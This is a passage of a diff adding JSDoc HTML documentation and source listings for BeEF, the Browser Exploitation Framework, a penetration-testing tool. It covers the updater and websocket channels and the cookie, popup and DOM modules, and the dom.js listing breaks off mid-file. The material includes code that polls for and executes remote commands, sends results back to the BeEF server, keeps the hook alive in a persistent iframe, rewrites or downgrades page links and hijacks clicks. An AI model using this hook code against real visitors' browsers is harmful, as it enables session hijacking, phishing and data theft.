<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

731
docs/beef.updater.html Normal file
View File

@@ -0,0 +1,731 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: updater</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: updater</h1>
<section>
<header>
<h2>updater</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Object in charge of getting new commands from the BeEF framework and execute them.
The XHR-polling channel is managed here. If WebSockets are enabled,
websocket.ls is used instead.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="updater.js.html">updater.js</a>, <a href="updater.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Members</h3>
<h4 class="name" id=".beefhook"><span class="type-signature">(static) </span>beefhook<span class="type-signature"></span></h4>
<div class="description">
<p>Hook session name.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="updater.js.html">updater.js</a>, <a href="updater.js.html#line19">line 19</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".lock"><span class="type-signature">(static) </span>lock<span class="type-signature"></span></h4>
<div class="description">
<p>A lock.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="updater.js.html">updater.js</a>, <a href="updater.js.html#line22">line 22</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".objects"><span class="type-signature">(static) </span>objects<span class="type-signature"></span></h4>
<div class="description">
<p>An object containing all values to be registered and sent by the updater.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="updater.js.html">updater.js</a>, <a href="updater.js.html#line25">line 25</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".xhr_poll_timeout"><span class="type-signature">(static) </span>xhr_poll_timeout<span class="type-signature"></span></h4>
<div class="description">
<p>XHR-polling timeout.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="updater.js.html">updater.js</a>, <a href="updater.js.html#line16">line 16</a>
</li></ul></dd>
</dl>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".execute_commands"><span class="type-signature">(static) </span>execute_commands<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Executes the received commands, if any.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="updater.js.html">updater.js</a>, <a href="updater.js.html#line75">line 75</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".get_commands"><span class="type-signature">(static) </span>get_commands<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Gets new commands from the framework.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="updater.js.html">updater.js</a>, <a href="updater.js.html#line58">line 58</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".regObject"><span class="type-signature">(static) </span>regObject<span class="signature">(key, value)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Registers an object to always send when requesting new commands to the framework.</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>key</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the name of the object.</p></td>
</tr>
<tr>
<td class="name"><code>value</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the value of that object.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="updater.js.html">updater.js</a>, <a href="updater.js.html#line34">line 34</a>
</li></ul></dd>
</dl>
<h5>Example</h5>
<pre class="prettyprint"><code>beef.updater.regObject('java_enabled', 'true');</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

3071
docs/beef.webrtc.html Normal file
View File

File diff suppressed because it is too large Load Diff

499
docs/beef.websocket.html Normal file
View File

@@ -0,0 +1,499 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: websocket</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: websocket</h1>
<section>
<header>
<h2>websocket</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Manage the WebSocket communication channel.
This channel is much faster and responsive, and it's used automatically
if the browser supports WebSockets AND beef.http.websocket.enable = true.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="websocket.js.html">websocket.js</a>, <a href="websocket.js.html#line8">line 8</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".alive"><span class="type-signature">(static) </span>alive<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Polling mechanism, to notify the BeEF server that the browser is still hooked,
and the WebSocket channel still alive.
todo: there is probably a more efficient way to do this. Double-check WebSocket API.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="websocket.js.html">websocket.js</a>, <a href="websocket.js.html#line86">line 86</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".init"><span class="type-signature">(static) </span>init<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Initialize the WebSocket client object.
Note: use WebSocketSecure only if the hooked origin is under https.
Mixed-content in WS is quite different from a non-WS context.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="websocket.js.html">websocket.js</a>, <a href="websocket.js.html#line26">line 26</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".send"><span class="type-signature">(static) </span>send<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Send data back to BeEF. This is basically the same as beef.net.send,
but doesn't queue commands.
Example usage:
beef.websocket.send('{&quot;handler&quot; : &quot;' + handler + '&quot;, &quot;cid&quot; :&quot;' + cid +
'&quot;, &quot;result&quot;:&quot;' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
'&quot;,&quot;callback&quot;: &quot;' + callback + '&quot;,&quot;bh&quot;:&quot;' + beef.session.get_hook_session_id() + '&quot; }');</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="websocket.js.html">websocket.js</a>, <a href="websocket.js.html#line75">line 75</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".start"><span class="type-signature">(static) </span>start<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Send Helo message to the BeEF server and start async polling.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="websocket.js.html">websocket.js</a>, <a href="websocket.js.html#line48">line 48</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

4701
docs/browser.js.html Normal file
View File

File diff suppressed because it is too large Load Diff

172
docs/browser_cookie.js.html Normal file
View File

@@ -0,0 +1,172 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: browser/cookie.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: browser/cookie.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides fuctions for working with cookies.
* Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
* Original author unknown.
* @namespace beef.browser.cookie
*/
beef.browser.cookie = {
/** @memberof beef.browser.cookie */
setCookie: function (name, value, expires, path, domain, secure)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires )
{
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
( ( path ) ? ";path=" + path : "" ) +
( ( domain ) ? ";domain=" + domain : "" ) +
( ( secure ) ? ";secure" : "" );
},
/** @memberof beef.browser.cookie */
getCookie: function(name)
{
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i &lt; a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
},
/** @memberof beef.browser.cookie */
deleteCookie: function (name, path, domain)
{
if ( this.getCookie(name) ) document.cookie = name + "=" +
( ( path ) ? ";path=" + path : "") +
( ( domain ) ? ";domain=" + domain : "" ) +
";expires=Thu, 01-Jan-1970 00:00:01 GMT";
},
/** @memberof beef.browser.cookie */
veganLol: function (){
var to_hell= '';
var min = 17;
var max = 25;
var lol_length = Math.floor(Math.random() * (max - min + 1)) + min;
var grunt = function(){
var moo = Math.floor(Math.random() * 62);
var char = '';
if(moo &lt; 36){
char = String.fromCharCode(moo + 55);
}else{
char = String.fromCharCode(moo + 61);
}
if(char != ';' &amp;&amp; char != '='){
return char;
}else{
return 'x';
}
};
while(to_hell.length &lt; lol_length){
to_hell += grunt();
}
return to_hell;
},
/** @memberof beef.browser.cookie */
hasSessionCookies: function (name){
this.setCookie( name, beef.browser.cookie.veganLol(), '', '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');
return cookiesEnabled;
},
/** @memberof beef.browser.cookie */
hasPersistentCookies: function (name){
this.setCookie( name, beef.browser.cookie.veganLol(), 1, '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');
return cookiesEnabled;
}
};
beef.regCmp('beef.browser.cookie');</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

1165
docs/browser_jools.html Normal file
View File

File diff suppressed because it is too large Load Diff

79
docs/browser_popup.js.html Normal file
View File

@@ -0,0 +1,79 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: browser/popup.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: browser/popup.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides fuctions for working with cookies.
* Several functions adopted from http://davidwalsh.name/popup-block-javascript
* Original author unknown.
* @namespace beef.browser.popup
*/
beef.browser.popup = {
/** @memberof beef.browser.popup */
blocker_enabled: function ()
{
screenParams = beef.hardware.getScreenSize();
var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
if (popUp == null || typeof(popUp)=='undefined') {
return true;
} else {
popUp.close();
return false;
}
}
};
beef.regCmp('beef.browser.popup');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

554
docs/dom.js.html Normal file
View File

@@ -0,0 +1,554 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: dom.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: dom.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides functionality to manipulate the DOM.
* @namespace beef.dom
*/
beef.dom = {
/**
* Generates a random ID for HTML elements
* @param {String} prefix a custom prefix before the random id. defaults to "beef-"
* @return {String} generated id
*/
generateID: function(prefix) {
return ((prefix == null) ? 'beef-' : prefix)+Math.floor(Math.random()*99999);
},
/**
* Creates a new element but does not append it to the DOM.
* @param {String} type the name of the element.
* @param {Array} attributes the attributes of that element.
* @return {Array} the created element.
*/
createElement: function(type, attributes) {
var el = document.createElement(type);
for(index in attributes) {
if(typeof attributes[index] == 'string') {
el.setAttribute(index, attributes[index]);
}
}
return el;
},
/**
* Removes element from the DOM.
* @param {Object} el the target element to be removed.
*/
removeElement: function(el) {
if (!beef.dom.isDOMElement(el))
{
el = document.getElementById(el);
}
try {
el.parentNode.removeChild(el);
} catch (e) { }
},
/**
* Tests if the object is a DOM element.
* @param {Object} the DOM element.
* @return {boolean} true if the object is a DOM element.
*/
isDOMElement: function(obj) {
return (obj.nodeType) ? true : false;
},
/**
* Creates an invisible iframe on the hook browser's page.
* @return {array} the iframe.
*/
createInvisibleIframe: function() {
var iframe = this.createElement('iframe', {
width: '1px',
height: '1px',
style: 'visibility:hidden;'
});
document.body.appendChild(iframe);
return iframe;
},
/**
* Returns the highest current z-index
* @param {Boolean} whether to return an associative array with the height AND the ID of the element
* @return {Integer} Highest z-index in the DOM
* OR
* @return {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
*/
getHighestZindex: function(include_id) {
var highest = {'height':0, 'elem':''};
$j('*').each(function() {
var current_high = parseInt($j(this).css("zIndex"),10);
if (current_high > highest.height) {
highest.height = current_high;
highest.elem = $j(this).attr('id');
}
});
if (include_id) {
return highest;
} else {
return highest.height;
}
},
/**
* Create an iFrame element and prepend to document body. URI passed via 'src' property of function's 'params' parameter
* is assigned to created iframe tag's src attribute resulting in GET request to that URI.
* example usage in the code: beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null);
* @param {String} type: can be 'hidden' or 'fullScreen'. defaults to normal
* @param {Hash} params: list of params that will be sent in request.
* @param {Hash} styles: css styling attributes, these are merged with the defaults specified in the type parameter
* @param {Function} a callback function to fire once the iFrame has loaded
* @return {Object} the inserted iFrame
*
*/
createIframe: function(type, params, styles, onload) {
var css = {};
if (type == 'hidden') {
css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
} else if (type == 'fullscreen') {
css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
$j('body').css({'padding':'0px', 'margin':'0px'});
} else {
css = styles;
$j('body').css({'padding':'0px', 'margin':'0px'});
}
var iframe = $j('&lt;iframe />').attr(params).css(css).load(onload).prependTo('body');
return iframe;
},
/**
* Load the link (href value) in an overlay foreground iFrame.
* The BeEF hook continues to run in background.
* NOTE: if the target link is returning X-Frame-Options deny/same-origin or uses
* Framebusting techniques, this will not work.
*/
persistentIframe: function(){
$j('a').click(function(e) {
if ($j(this).attr('href') != '')
{
e.preventDefault();
beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null);
$j(document).attr('title', $j(this).html());
document.body.scroll = "no";
document.documentElement.style.overflow = 'hidden';
}
});
},
/**
* Load a full screen div that is black, or, transparent
* @param {Boolean} vis: whether or not you want the screen dimmer enabled or not
* @param {Hash} options: a collection of options to customise how the div is configured, as follows:
* opacity:0-100 // Lower number = less grayout higher = more of a blackout
* // By default this is 70
* zindex: # // HTML elements with a higher zindex appear on top of the gray out
* // By default this will use beef.dom.getHighestZindex to always go to the top
* bgcolor: (#xxxxxx) // Standard RGB Hex color code
* // By default this is #000000
*/
grayOut: function(vis, options) {
// in any order. Pass only the properties you need to set.
var options = options || {};
var zindex = options.zindex || beef.dom.getHighestZindex()+1;
var opacity = options.opacity || 70;
var opaque = (opacity / 100);
var bgcolor = options.bgcolor || '#000000';
var dark=document.getElementById('darkenScreenObject');
if (!dark) {
// The dark layer doesn't exist, it's never been created. So we'll
// create it here and apply some basic styles.
// If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
var tbody = document.getElementsByTagName("body")[0];
var tnode = document.createElement('div'); // Create the layer.
tnode.style.position='absolute'; // Position absolutely
tnode.style.top='0px'; // In the top
tnode.style.left='0px'; // Left corner of the page
tnode.style.overflow='hidden'; // Try to avoid making scroll bars
tnode.style.display='none'; // Start out Hidden
tnode.id='darkenScreenObject'; // Name it so we can find it later
tbody.appendChild(tnode); // Add it to the web page
dark=document.getElementById('darkenScreenObject'); // Get the object.
}
if (vis) {
// Calculate the page width and height
if( document.body &amp;&amp; ( document.body.scrollWidth || document.body.scrollHeight ) ) {
var pageWidth = document.body.scrollWidth+'px';
var pageHeight = document.body.scrollHeight+'px';
} else if( document.body.offsetWidth ) {
var pageWidth = document.body.offsetWidth+'px';
var pageHeight = document.body.offsetHeight+'px';
} else {
var pageWidth='100%';
var pageHeight='100%';
}
//set the shader to cover the entire page and make it visible.
dark.style.opacity=opaque;
dark.style.MozOpacity=opaque;
dark.style.filter='alpha(opacity='+opacity+')';
dark.style.zIndex=zindex;
dark.style.backgroundColor=bgcolor;
dark.style.width= pageWidth;
dark.style.height= pageHeight;
dark.style.display='block';
} else {
dark.style.display='none';
}
},
/**
* Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
* or, re-writing a document this is useful.
*/
removeStylesheets: function() {
$j('link[rel=stylesheet]').remove();
$j('style').remove();
},
/**
* Create a form element with the specified parameters, appending it to the DOM if append == true
* @param {Hash} params: params to be applied to the form element
* @param {Boolean} append: automatically append the form to the body
* @return {Object} a form object
*/
createForm: function(params, append) {
var form = $j('&lt;form>&lt;/form>').attr(params);
if (append)
$j('body').append(form);
return form;
},
loadScript: function(url) {
var s = document.createElement('script');
s.type = 'text/javascript';
s.src = url;
$j('body').append(s);
},
/**
* Get the location of the current page.
* @return the location.
*/
getLocation: function() {
return document.location.href;
},
/**
* Get links of the current page.
* @return array of URLs.
*/
getLinks: function() {
var linksarray = [];
var links = document.links;
for(var i = 0; i&lt;links.length; i++) {
linksarray = linksarray.concat(links[i].href)
};
return linksarray
},
/**
* Rewrites all links matched by selector to url, also rebinds the click method to simply return true
* @param {String} url: the url to be rewritten
* @param {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return {Number} the amount of links found in the DOM and rewritten.
*/
rewriteLinks: function(url, selector) {
var sel = (selector == null) ? 'a' : selector;
return $j(sel).each(function() {
if ($j(this).attr('href') != null)
{
$j(this).attr('href', url).click(function() { return true; });
}
}).length;
},
/**
* Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
* http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html
* @param {String} url: the url to be rewritten
* @param {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return {Number} the amount of links found in the DOM and rewritten.
*/
rewriteLinksClickEvents: function(url, selector) {
var sel = (selector == null) ? 'a' : selector;
return $j(sel).each(function() {
if ($j(this).attr('href') != null)
{
$j(this).click(function() {this.href=url});
}
}).length;
},
/**
* Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)
* @param {String} old_protocol: the old link protocol to be rewritten
* @param {String} new_protocol: the new link protocol to be written
* @param {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return {Number} the amount of links found in the DOM and rewritten.
*/
rewriteLinksProtocol: function(old_protocol, new_protocol, selector) {
var count = 0;
var re = new RegExp(old_protocol+"://", "gi");
var sel = (selector == null) ? 'a' : selector;
$j(sel).each(function() {
if ($j(this).attr('href') != null) {
var url = $j(this).attr('href');
if (url.match(re)) {
$j(this).attr('href', url.replace(re, new_protocol+"://")).click(function() { return true; });
count++;
}
}
});
return count;
},
/**
* Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number
* @param {String} new_number: the new link telephone number to be written
* @param {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return {Number} the amount of links found in the DOM and rewritten.
*/
